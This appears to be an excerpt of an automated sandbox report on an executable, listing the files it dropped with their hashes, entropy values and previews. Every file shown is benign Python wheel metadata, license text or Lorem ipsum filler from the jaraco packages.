                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2891
                                                                                                                                                                                                                              Entropy (8bit):5.034580807599395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEmbsaC3J1x9Ie9okNGwQw8wQw2wTw0zCPU0+I65Jib0H++kv0gM5d0DT+heU04u:DEmgaCZ1nTGDbHRAnzpI6o+fX5dFSwTm
                                                                                                                                                                                                                              MD5:C2E6BDA7F1B03B39BF42D31B6DBF6C38
                                                                                                                                                                                                                              SHA1:B7A18F079DE22D10C4C318E54BD8C48177F91333
                                                                                                                                                                                                                              SHA-256:8B86946900D7FA38DD1102B9C1EBE17A0CB1F09C8B7E29F61F2BDA4A4DC51ECA
                                                                                                                                                                                                                              SHA-512:F4E892B3D41482E3B17642B1D722B6E2A8E8DD4833F0623C29ED2D50D55CFC68DA1F9756B4E08723DC89F3E552424096C92912AC4DA533FE8E2DC59DC19EA9CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.functools.Version: 4.0.1.Summary: Functools like those found in stdlib.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.functools.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest >=6 ;
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                              Entropy (8bit):5.807846597836061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Tmn/2zDRvbqfuggoaGnXamZlKZBX3vpBvt+c0X4yWJV:TmnuXRzUuggDifZlmX/aWJV
                                                                                                                                                                                                                              MD5:85FB54BAFB143CD57D1787F7EF74FDB2
                                                                                                                                                                                                                              SHA1:A915BBCDF108A58F3DFC1783D9D4DD3B7F3CE23A
                                                                                                                                                                                                                              SHA-256:632AA7C04F7C4BCC01C027AF5B9BC76FE8958F4A181035B957A3BD3014BA248B
                                                                                                                                                                                                                              SHA-512:2A39B4C6F221F88EC61D584C8CD3CAD358E8C7B50E529192105A0A4144ED3C2A4CE8B630C39C18D20E27FE226A23E2DE23CDFF8E3D3693959B165A9A2F9047CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.functools-4.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.functools-4.0.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.functools-4.0.1.dist-info/METADATA,sha256=i4aUaQDX-jjdEQK5wevhegyx8JyLfin2HyvaSk3FHso,2891..jaraco.functools-4.0.1.dist-info/RECORD,,..jaraco.functools-4.0.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.functools-4.0.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/functools/__init__.py,sha256=hEAJaS2uSZRuF_JY4CxCHIYh79ZpxaPp9OiHyr9EJ1w,16642..jaraco/functools/__init__.pyi,sha256=gk3dsgHzo5F_U74HzAvpNivFAPCkPJ1b2-yCd62dfnw,3878..jaraco/functools/__pycache__/__init__.cpython-312.pyc,,..jaraco/functools/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3658
                                                                                                                                                                                                                              Entropy (8bit):5.02710641474483
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DYMaCFS802Vpnu388Ksc+fIybwFiR8g6RSwTsL:pFz02Vpnu388KB+gybwgRd6RSwTsL
                                                                                                                                                                                                                              MD5:70FE732EDE8F8E6C84DA4EA21D4933E5
                                                                                                                                                                                                                              SHA1:A7763789FA56CEBBAA849368FAAC7D386F170399
                                                                                                                                                                                                                              SHA-256:03359D9BA56231F0CE3E840C7CB5A7DB380141218949CCAA78DDBD4DCB965D52
                                                                                                                                                                                                                              SHA-512:4C8D3D5078840BD4DBE20458EBF52890585C5911C22C3EFCE2FB28985461BC80469339DDAF6016FB099C84BDF9B41A26FF1884B456422A8D0C682104D7950D91
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.text.Version: 3.12.1.Summary: Module for text manipulation.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.text.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.functools.Requires-Dist: jaraco.context >=4.1.Requires-Dist: autocommand.Requires-Dist: inflect.Requires-Dist: more-itertools.Requires-Dist: importlib-resources ; python_version < "3.9".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1500
                                                                                                                                                                                                                              Entropy (8bit):5.794249493238335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TkLFn/2zDVLFvbqfuaLFo2kXLFGnLFEsJiLFXamdLFlKbkZ6d3JpPXu/1XWXYXw2:TcnuXDzUuuCw5Jmfblyz3Jp2/NUsM0bN
                                                                                                                                                                                                                              MD5:39FCCE64BC768C2046067E4AAD8465F0
                                                                                                                                                                                                                              SHA1:2EFC0FC776576A8FE01BBACD0760A49EEE6481DA
                                                                                                                                                                                                                              SHA-256:816D945741DCA246099388CA3EED74FC0667ACBAA36F70B559B2494C3979B1F6
                                                                                                                                                                                                                              SHA-512:FB2335A6675F9CADEEE38B666FAB9EA1D8BFBA6B7768253D42F44149591A3239F4B2FA19DDF2C282DC7E47A01D7DCA69AADBBCDAC9107EDBCB2C22D11BA81287
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.text-3.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.text-3.12.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.text-3.12.1.dist-info/METADATA,sha256=AzWdm6ViMfDOPoQMfLWn2zgBQSGJScyqeN29TcuWXVI,3658..jaraco.text-3.12.1.dist-info/RECORD,,..jaraco.text-3.12.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.text-3.12.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.text-3.12.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/text/Lorem ipsum.txt,sha256=N_7c_79zxOufBY9HZ3yzMgOkNv-TkOTTio4BydrSjgs,1335..jaraco/text/__init__.py,sha256=Y2YUqXR_orUoDaY4SkPRe6ZZhb5HUHB_Ah9RCNsVyho,16250..jaraco/text/__pycache__/__init__.cpython-312.pyc,,..jaraco/text/__pycache__/layouts.cpython-312.pyc,,..jaraco/text/__pycache__/show-newlines.cpython-312.pyc,,..jaraco/text/__pycache__/strip-prefix.cpython-312.pyc,,..jaraco/text/__py
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1335
                                                                                                                                                                                                                              Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                              MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                              SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                              SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                              SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1053
                                                                                                                                                                                                                              Entropy (8bit):5.0945274555157285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:arOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:aSJrlxEvdQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:3396EA30F9D21389D7857719816F83B5
                                                                                                                                                                                                                              SHA1:0D43A836DAC65C0EA426AD49C881A1086600BF85
                                                                                                                                                                                                                              SHA-256:09F1C8C9E941AF3E584D59641EA9B87D83C0CB0FD007EB5EF391A7E2643C1A46
                                                                                                                                                                                                                              SHA-512:D43092223392EDDA3BD777625F5BF54ACB0CC00C25555A4F8A16DB9CCDAFC380D3204486CB2A5FDC9D3F9E459B1FED948FFC7000AA0E40F37B807A01F4421294
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Copyright (c) 2012 Erik Rose..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SO
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36293
                                                                                                                                                                                                                              Entropy (8bit):3.717596190655759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:bs9cnyPtWIRmL0QnCHx4Zi3XBB9GcF89oi+odVBqCv9d3m24TeYH5AvDpG27IFf5:Ua+H1Nsg/
                                                                                                                                                                                                                              MD5:5BA05B51B603386707E1E3A101CDD6B3
                                                                                                                                                                                                                              SHA1:FFCCEC7FD799CC4AB07530954FEF3BE2472E2C23
                                                                                                                                                                                                                              SHA-256:0453BDD0EF9F2CD89540CA63EE8212E73B73809514419DD3037D8FE471F737E0
                                                                                                                                                                                                                              SHA-512:FE7F7D6B6C8089B09A18930EF462BA4C7A15EAF6D3E8610AC655ECADE16CE31D9C01ECE84C88A3C2D9DD34DE70E194A020E28179CF33B21389EE3EEFC7229B74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
